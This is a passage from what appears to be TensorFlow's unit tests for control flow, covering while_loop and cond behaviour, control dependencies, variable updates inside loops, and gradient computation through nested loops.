self.assertEqual(10, sess.run(r, {b: True}))
def testWhileWithControl_4(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
with ops.control_dependencies([b]):
r = control_flow_ops.while_loop(
lambda x: x < 10, lambda x: x + array_ops.identity(c), [x0])
self.assertEqual(10, sess.run(r, {b: True}))
@test_util.disable_control_flow_v2("b/79881896 (control_deps)")
def testWhileWithControl_5(self):
with self.cached_session() as sess:
b = array_ops.placeholder(dtypes.bool)
c = constant_op.constant(1)
x0 = constant_op.constant(0)
def body(x):
with ops.control_dependencies([b]):
return x + c
r = control_flow_ops.while_loop(lambda x: x < 10, body, [x0])
self.assertEqual(10, sess.run(r, {b: True}))
def testWhileCondWithControl(self):
# Ensure that no control edges by an outer control dependency context are
# added to nodes inside cond/while contexts.
with self.cached_session() as sess:
const_true = lambda: constant_op.constant(True)
const_false = lambda: constant_op.constant(False)
cond = lambda i: control_flow_ops.cond(i > 0, const_true, const_false)
body = lambda i: control_flow_ops.cond(i > 0, lambda: i - 1, lambda: i)
with ops.control_dependencies([control_flow_ops.no_op()]):
loop = control_flow_ops.while_loop(cond, body,
(constant_op.constant(5),))
self.assertEqual(0, sess.run(loop))
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
def testWhileCondWithControl_1(self):
with self.cached_session():
v = variable_scope.get_variable(
"v", [], initializer=init_ops.constant_initializer(2))
i0 = constant_op.constant(0)
with ops.control_dependencies([i0]):
def loop_condition(i):
return i < 4
def loop_body(i):
some_cond = control_flow_ops.cond(
constant_op.constant(True),
lambda: state_ops.assign(v, math_ops.square(v)), lambda: v)
with ops.control_dependencies([some_cond]):
return i + 1
r = control_flow_ops.while_loop(loop_condition, loop_body, (i0,))
variables.global_variables_initializer().run()
self.assertEqual(4, r.eval())
self.assertAllClose(65536.0, v.eval())
@test_util.disable_control_flow_v2("b/113324949 (ref vars)")
def testWhileCondExitControl(self):
with self.cached_session():
v = variables.Variable(1)
def false_branch():
cond = lambda i: i < 100
def body(i):
x = state_ops.assign(v, i)
return x + 1
loop = control_flow_ops.while_loop(cond, body, [0])
# Make sure to handle correctly control edge from Exit to a node.
with ops.control_dependencies([loop]):
return constant_op.constant(6.0)
r = control_flow_ops.cond(
constant_op.constant(False), lambda: constant_op.constant(1.0),
false_branch)
variables.global_variables_initializer().run()
self.assertEqual(6.0, r.eval())
self.assertEqual(99, v.eval())
def testCondWhile_1(self):
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(0, 1), lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: n)
self.assertAllEqual(10, r.eval())
def testCondWhile_2(self):
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
b = lambda x: math_ops.add(x, 1)
r = control_flow_ops.cond(
math_ops.less(1, 0), lambda: math_ops.add(n, 1),
lambda: control_flow_ops.while_loop(c, b, [n]))
self.assertAllEqual(10, r.eval())
def _testCondWhile_3(self, use_gpu):
with self.test_session(use_gpu=use_gpu) as sess:
p = array_ops.placeholder(dtypes.bool)
n = constant_op.constant(0.0)
def c(x):
return math_ops.less(x, 10.0)
def b(x):
with ops.device("/cpu:0"):
x1 = math_ops.add(x, 1.0)
return x1
r = control_flow_ops.cond(p,
lambda: control_flow_ops.while_loop(c, b, [n]),
lambda: math_ops.multiply(n, 2.0))
r1 = gradients_impl.gradients(r, [n])
self.assertEqual(10., sess.run(r, {p: True}))
self.assertEqual([1.0], sess.run(r1, {p: True}))
self.assertEqual(0.0, sess.run(r, {p: False}))
self.assertEqual([2.0], sess.run(r1, {p: False}))
@test_util.disable_control_flow_v2("b/116743589")
def testCondWhile_3(self):
self._testCondWhile_3(use_gpu=False)
self._testCondWhile_3(use_gpu=True)
def testWhileCond_1(self):
with self.cached_session():
i = ops.convert_to_tensor(0, name="i")
n = ops.convert_to_tensor(10, name="n")
one = ops.convert_to_tensor(1, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.add(x, one), lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [i])
self.assertAllEqual(10, r.eval())
def testWhileCond_2(self):
with self.cached_session():
n = ops.convert_to_tensor(0, name="n")
c = lambda x: math_ops.less(x, 10)
b = lambda x: control_flow_ops.cond(constant_op.constant(True), lambda: math_ops.add(x, 1), lambda: n)
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
def testWhileCond_3(self):
with self.cached_session():
n = ops.convert_to_tensor(0)
c = lambda x: math_ops.less(x, 10)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(math_ops.less(0, 1),
lambda: math_ops.add(x, 1),
lambda: math_ops.subtract(x, 1))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [n])
self.assertAllEqual(10, r.eval())
# NOTE: It is ok to have parallel_iterations > 1
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_1(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
variables.global_variables_initializer().run()
self.assertEqual(3, r.eval())
result = select.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_2(self):
with self.cached_session():
select1 = variables.Variable([3.0, 4.0, 5.0])
select2 = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j):
return math_ops.less(j, 3)
def loop_body(j):
ns1 = state_ops.scatter_update(select1, j, 10.0)
ns2 = state_ops.scatter_update(select2, j, 10.0)
nj = math_ops.add(j, 1)
op = control_flow_ops.group(ns1, ns2)
nj = control_flow_ops.with_dependencies([op], nj)
return [nj]
r = control_flow_ops.while_loop(
loop_iterator, loop_body, [n], parallel_iterations=1)
variables.global_variables_initializer().run()
self.assertEqual(3, r.eval())
result1 = select1.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result1)
result2 = select2.eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result2)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_3(self):
with self.cached_session():
select = variables.Variable([3.0, 4.0, 5.0])
n = constant_op.constant(0)
def loop_iterator(j, _):
return math_ops.less(j, 3)
def loop_body(j, _):
ns = state_ops.scatter_update(select, j, 10.0)
nj = math_ops.add(j, 1)
return [nj, ns]
r = control_flow_ops.while_loop(
loop_iterator,
loop_body, [n, array_ops.identity(select)],
parallel_iterations=1)
variables.global_variables_initializer().run()
result = r[1].eval()
self.assertAllClose(np.array([10.0, 10.0, 10.0]), result)
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_4(self):
with self.cached_session():
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
variables.global_variables_initializer().run()
c = constant_op.constant(0, name="c")
asn1 = state_ops.assign_add(var_a, 1, name="a_add")
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
asn2 = state_ops.assign_add(var_b, asn1, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1)
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(10, var_b.eval())
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_5(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
variables.global_variables_initializer().run()
# Change condition to check var_b
def pred(_):
return math_ops.less(var_b, 10)
# Change body to increment var_b
def loop_body(i):
asn1 = state_ops.assign_add(
var_a, constant_op.constant(1), name="a_add")
asn2 = state_ops.assign_add(
var_b, constant_op.constant(1), name="b_add")
with ops.control_dependencies([asn1, asn2]):
inc_b = array_ops.identity(var_b)
return inc_b
lpa = control_flow_ops.while_loop(
pred, loop_body, [var_b], parallel_iterations=1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(10, var_a.eval())
self.assertEqual(10, var_b.eval())
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileUpdateVariable_6(self):
with self.cached_session():
# Create some variables.
var_a = variables.Variable(0, name="a")
var_b = variables.Variable(0, name="b")
c = constant_op.constant(0)
variables.global_variables_initializer().run()
# Loop condition
def pred(i):
return math_ops.less(i, 10)
# Loop body
def loop_body(i):
asn1 = state_ops.assign_add(var_a, 1, name="a_add")
with ops.control_dependencies([asn1]):
asn2 = state_ops.assign_add(var_b, var_a, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
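      # var_a counts iterations (1..10) while var_b accumulates the running count,
      # so var_b ends at 1 + 2 + ... + 10 = 55.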
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
self.assertEqual(55, var_b.eval())
self.assertEqual(10, var_a.eval())
@test_util.disable_control_flow_v2("b/116742472 (resource accumulator)")
def testWhileQueue_1(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(-1, dtypes.int32)
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies([q.enqueue((i,))], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
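      # parallel_iterations=1 forces the enqueues to happen in order, so the queue
      # holds 0..9 once the loop finishes.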
self.assertEqual([10], r.eval())
for i in xrange(10):
self.assertEqual([i], q.dequeue().eval())
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhileStack_1(self):
with self.cached_session():
s = gen_data_flow_ops.stack_v2(-1, dtypes.int32, stack_name="foo")
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies(
[gen_data_flow_ops.stack_push_v2(s, i)], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
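      # A second loop pops the ten pushed values and sums them: 0 + 1 + ... + 9 = 45.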
x = constant_op.constant(0)
def c1(i, _):
return math_ops.greater(i, 0)
def b1(i, x):
ni = math_ops.subtract(i, 1)
nx = x + gen_data_flow_ops.stack_pop_v2(s, dtypes.int32)
return [ni, nx]
_, rx = control_flow_ops.while_loop(
c1,
b1, [r, x],
[r.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
self.assertEqual(45, rx.eval())
def _testWhileGrad_ColocateGradients(self, colocate):
gpu_dev_name = test.gpu_device_name() if test.is_gpu_available(
) else "/device:CPU:0"
graph = ops.Graph()
with graph.as_default():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
def b(x):
with ops.device(gpu_dev_name):
return math_ops.square(x)
loop = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(
loop, v, colocate_gradients_with_ops=colocate)[0]
r_ops = graph.get_operations()
r_devices = [(op.name, op.device) for op in r_ops]
self.assertTrue(any("Square" in op.name for op in r_ops))
for (name, dev) in r_devices:
if not colocate and name.endswith("Square"):
          # Without colocation, only the forward Square op is placed on the GPU device.
self.assertTrue(gpu_dev_name in dev)
elif colocate and "Square" in name:
          # With colocation, both the forward Square op and its Square_grad ops are on the GPU device.
self.assertTrue(gpu_dev_name in dev)
else:
self.assertFalse(gpu_dev_name in dev)
with self.session(graph=graph) as sess:
self.assertAllClose(1024.0, sess.run(r))
@test_util.disable_control_flow_v2("b/116351701 (colocation)")
def testWhileGrad_ColocateGradients(self):
self._testWhileGrad_ColocateGradients(colocate=False)
self._testWhileGrad_ColocateGradients(colocate=True)
def testWhileGrad_Square(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
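      # Three iterations square v: 2 -> 4 -> 16 -> 256, i.e. r = v**8, so dr/dv = 8 * v**7 = 1024.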
r = control_flow_ops.cond(math_ops.less(1, 2), lambda: r, lambda: v)
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(1024.0, r.eval())
@test_util.disable_control_flow_v2("b/116283162 (shape_invariants)")
def testWhileGrad_Shape(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=[None])
v = constant_op.constant([2.0], name="v")
n = constant_op.constant(0, name="n")
c = lambda i, v: math_ops.less(i, 5)
b = lambda i, v: [i + 1, math_ops.multiply(x, v)]
r = control_flow_ops.while_loop(
c,
b, [n, v],
[n.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
r = gradients_impl.gradients(r[1], x)[0]
self.assertEqual([None], r.get_shape().as_list())
self.assertAllClose([810.0, 2560.0], r.eval(feed_dict={x: [3.0, 4.0]}))
def testWhileGrad_BaseShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32, [None])
v0 = constant_op.constant([2.0, 2.0], name="v")
c = lambda v: constant_op.constant(False)
b = lambda v: math_ops.multiply(v, x)
r = control_flow_ops.while_loop(c, b, [v0])
y = math_ops.square(x)
r = gradients_impl.gradients([r, y], x)[0]
self.assertAllClose([2.0, 4.0], sess.run(r, feed_dict={x: [1.0, 2.0]}))
def testWhileGrad_MultipleUses(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.multiply(r, r)
r = gradients_impl.gradients(r, v)[0]
self.assertEqual(524288.0, r.eval())
def testWhileGrad_LoopAdd(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.add(r, r)
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(2048.0, r.eval())
def _testWhileGrad_Mul(self, use_gpu, p_iters):
with self.test_session(use_gpu=use_gpu) as sess:
a = constant_op.constant(3.0, name="a")
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=p_iters)
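      # Four iterations give r = v * a**4 = 162, so dr/da = 4 * v * a**3 = 216 and dr/dv = a**4 = 81.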
grad_a, grad_v = gradients_impl.gradients(r, [a, v])
grad_a_val, grad_v_val = sess.run([grad_a, grad_v])
self.assertAllClose(216.0, grad_a_val)
self.assertAllClose(81.0, grad_v_val)
def testWhileGrad_Mul(self):
self._testWhileGrad_Mul(use_gpu=False, p_iters=1)
self._testWhileGrad_Mul(use_gpu=False, p_iters=10)
self._testWhileGrad_Mul(use_gpu=True, p_iters=1)
self._testWhileGrad_Mul(use_gpu=True, p_iters=10)
def _testNestedWhileCondWhileGrad(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
def b(x):
return control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.square(inner_loop(x)[1]),
lambda: math_ops.multiply(x, 2.0))
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(512.0, r.eval())
@test_util.disable_control_flow_v2("b/116248044 (nested while)")
def testNestedWhileCondWhileGrad(self):
self._testNestedWhileCondWhileGrad(use_gpu=False)
self._testNestedWhileCondWhileGrad(use_gpu=True)
@test_util.disable_control_flow_v2("b/116823782")
def testWhileGrad_Variable(self):
with self.cached_session():
a = variables.Variable(3.0)
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(r, a)
variables.global_variables_initializer().run()
self.assertAllClose(216.0, r[0].eval())
def testWhileGradInCond(self):
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def fn1():
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)
r = control_flow_ops.cond(math_ops.less(1, 2), fn1, lambda: x)
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
@test_util.disable_control_flow_v2("b/116340060")
def testGradInWhileWrtInitialLoopVal(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=(), name="x")
y = x + 1
def body(i, v):
z = v * 2
return i + 1, gradients_impl.gradients(z, x)[0]
with self.assertRaisesRegexp(
ValueError,
"Cannot compute gradient inside while loop with respect to op 'x'. "
"We do not support taking the gradient wrt or through the initial "
"value of a loop variable. Gradients can be computed through "
"loop invariants or wrt the input parameters to the loop body."):
control_flow_ops.while_loop(lambda i, x: i < 3, body, [0, y])
@test_util.disable_control_flow_v2("b/116248044 (nested while)")
def testWhileGradInWhile(self):
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def b1(n):
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)
r = control_flow_ops.while_loop(lambda n: n < 6.0, b1, [n],
[tensor_shape.unknown_shape()])
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
@test_util.disable_control_flow_v2("b/116248044 (nested while)")
def testCondGradInNestedWhiles(self):
def outer_body(i, x):
_, x = control_flow_ops.while_loop(
lambda j, x: j < 3, inner_body, [0, 0.0])
return i + 1, x
def inner_body(j, x):
y = control_flow_ops.cond(math_ops.less(x, 1), lambda: 2 * x, lambda: x)
return j + 1, gradients_impl.gradients(y, x)[0]
i, x = control_flow_ops.while_loop(lambda i, x: i < 3, outer_body, [0, 0.0])
with self.cached_session() as sess:
i_val, x_val = sess.run([i, x])
self.assertEqual(i_val, 3)
self.assertAllClose(x_val, 1.0)
@test_util.disable_control_flow_v2("b/116255781 (flat_args)")
def testWhile_NestedInput(self):
with self.cached_session() as sess:
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, lv2):
lv0 = named(a=lv0.a + 1, b=lv0.b)
lv1 = (lv1[0] + 1, lv1[1])
lv2 += 2
return [lv0, lv1, lv2]
r = control_flow_ops.while_loop(c, b, loop_vars)
self.assertTrue(isinstance(r, list))
self.assertTrue(isinstance(r[0], named))
self.assertTrue(isinstance(r[1], tuple))
self.assertTrue(isinstance(r[2], ops.Tensor))
r_flattened = nest.flatten(r)
self.assertEqual([100.0, 1.0, 102.0, 3.0, 4.0 + 100 * 2.0],
sess.run(r_flattened))
@test_util.disable_control_flow_v2("b/116255781(flat_args)")
def testWhile_NestedBadArityFails(self):
with self.cached_session():
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, _):
return [lv0, lv1]
with self.assertRaisesRegexp(ValueError, "the same number of elements"):
control_flow_ops.while_loop(c, b, loop_vars)
def testWhileGrad_ys_xs(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.add(x, y)
x1 = math_ops.multiply(x, y1)
return x1, y1
rx, ry = control_flow_ops.while_loop(c, b, [x, y], parallel_iterations=1)
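      # Two iterations give ry = (x + 1)(x + y) = 20 and rx = (x**2 + x)(x + y)**2 = 300;
      # the expected gradient values below follow from these closed forms.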
r = gradients_impl.gradients([rx, ry], x)
self.assertAllClose(304.0, r[0].eval())
r = gradients_impl.gradients([rx, ry], y)
self.assertAllClose(124.0, r[0].eval())
r = gradients_impl.gradients([rx], x)
self.assertAllClose(295.0, r[0].eval())
r = gradients_impl.gradients([rx], y)
self.assertAllClose(120.0, r[0].eval())
def testWhileGrad_Dependency(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 10)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
ri, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
r = gradients_impl.gradients([ri, rx], x)
self.assertAllClose(1024.0, r[0].eval())
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
@test_util.disable_control_flow_v2("b/116355153 (back_prop flag)")
def testWhileGrad_NoGradient(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], back_prop=False)
r = math_ops.add(r, v)
r = gradients_impl.gradients(r, v)
self.assertAllClose(1.0, r[0].eval())
@test_util.disable_control_flow_v2("b/113324949 (RefVariable)")
def testWhileGrad_NoDependency(self):
with self.cached_session() as sess:
variable = variables.Variable(array_ops.ones([2, 3]))
duration = array_ops.zeros([], dtype=dtypes.int32)
def cond(duration, tensor, _):
del tensor
return duration < 10
def body(duration, tensor, _):
return (duration + 1, tensor, tensor)
loop_vars = [duration, variable, variable]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[2])
grad = gradients_impl.gradients(cost, [variable])
variables.global_variables_initializer().run()
self.assertAllClose(np.ones([2, 3]), sess.run(grad[0]))
def testWhileGrad_Const(self):
with self.cached_session() as sess:
c0 = constant_op.constant(0.0, name="c0")
c1 = constant_op.constant(1.0, name="c1")
duration = constant_op.constant(0, name="t")
def cond(duration, _):
return duration < 1
def body(duration, _):
return duration + 1, c1
loop_vars = [duration, c0]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[1])
grad = gradients_impl.gradients(cost, [c0])
self.assertAllClose(0.0, sess.run(grad[0]))
def testWhileGrad_SerialTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, rx = control_flow_ops.while_loop(c, b, [i, rx], parallel_iterations=1)
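      # Each serial loop doubles x five times, so rx = x * 2**10 and drx/dx = 1024.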
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
def testWhileGrad_ParallelTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, r1 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, r2 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
rx = math_ops.add(r1, r2)
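      # Each independent loop contributes a factor of 2**5, so d(r1 + r2)/dx = 32 + 32 = 64.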
r = gradients_impl.gradients([rx], x)
self.assertAllClose(64.0, r[0].eval())
def testWhileGrad_OneOutputWithControlDependencyOnSecond(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(1.0, name="y")
c = lambda i, *_: math_ops.less(i, 1, name="cond_less")
def b(i, xi, yi):
# return (i + 1, xi, xi + yi)
return (math_ops.add(i, 1, name="inc"), array_ops.identity(
xi, name="xi"), math_ops.add(xi, yi, name="xi_plus_yi"))
_, x_f, y_f = control_flow_ops.while_loop(c, b, [i, x, y])
with ops.control_dependencies([x_f]):
y_f_d = array_ops.identity(y_f, name="y_f_d")
self.assertAllClose(2.0, y_f_d.eval()) # y_f_d = 1.0 + 1.0
g = gradients_impl.gradients([y_f_d], [x])[0]
self.assertTrue(g is not None)
self.assertAllClose(1.0, g.eval()) # y_f_d = x + 1.0, dy_f_d/dx = 1.0
def _testNestedWhileGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
c = lambda x: math_ops.less(x, 4.0)
b = lambda x: math_ops.multiply(x, 2.0)
return control_flow_ops.while_loop(c, b, [s])
c = lambda x: math_ops.less(x, 2.0)
b = lambda x: math_ops.multiply(inner_loop(x), 2.0)
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(8.0, r.eval())
@test_util.disable_control_flow_v2("b/116248044 (nested)")
def testNestedWhileGrad_Simple(self):
self._testNestedWhileGrad_Simple(use_gpu=False)
self._testNestedWhileGrad_Simple(use_gpu=True)
@test_util.disable_control_flow_v2("b/116248044 (nested)")
def testNestedWhileGrad_SerialInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: inner_loop2(inner_loop1(x)[1])[1]
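      # Each inner loop multiplies by 2**4, so one outer iteration scales x by 256 and dr/dv = 256.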
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(256.0, r.eval())
@test_util.disable_control_flow_v2("b/116248044 (nested)")
def testNestedWhileGrad_ParallelInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: math_ops.multiply(inner_loop1(x)[1], inner_loop2(x)[1])
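      # One outer iteration computes (16 * x) * (16 * x) = 256 * x**2, so dr/dv at v = 1 is 512.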
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(512.0, r.eval())
@test_util.disable_control_flow_v2(
"Nested loops and TensorArrays not supported")
def testNestedWhileGrad_ParallelIterations(self):
# Make sure the stack pushes and pops of an inner loop are executed in
# the sequential order of the iterations of its outer loop.
with self.cached_session() as sess:
def inner_loop(t):
fn = lambda n: n + math_ops.square(var)
return functional_ops.map_fn(fn=fn, elems=t, parallel_iterations=10)
def outer_loop(inp):
return functional_ops.map_fn(
fn=inner_loop, elems=inp, parallel_iterations=10)
var = variables.Variable(constant_op.constant(3.0))
inp = constant_op.constant([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])
res = outer_loop(inp)
optimizer = adam.AdamOptimizer(learning_rate=0.001)
train_op = optimizer.minimize(math_ops.reduce_mean(math_ops.square(res)))
sess.run(variables.global_variables_initializer())
sess.run(train_op)
self.assertAllClose(2.999, var.eval())
def _testWhileCondGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = ops.convert_to_tensor(2.0, name="v")
n = ops.convert_to_tensor(100.0, name="n")
one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
self.assertAllClose(1024.0, r.eval())
@test_util.disable_control_flow_v2("b/116272044 (cond_in_while)")
def testWhileCondGrad_Simple(self):
self._testWhileCondGrad_Simple(use_gpu=False)
self._testWhileCondGrad_Simple(use_gpu=True)
@test_util.disable_control_flow_v2("b/116272044 (cond_in_while)")
def testWhileCondGrad_UnknownShape(self):
with self.cached_session() as sess:
v = array_ops.placeholder(dtypes.float32)
n = ops.convert_to_tensor(100.0, name="n")
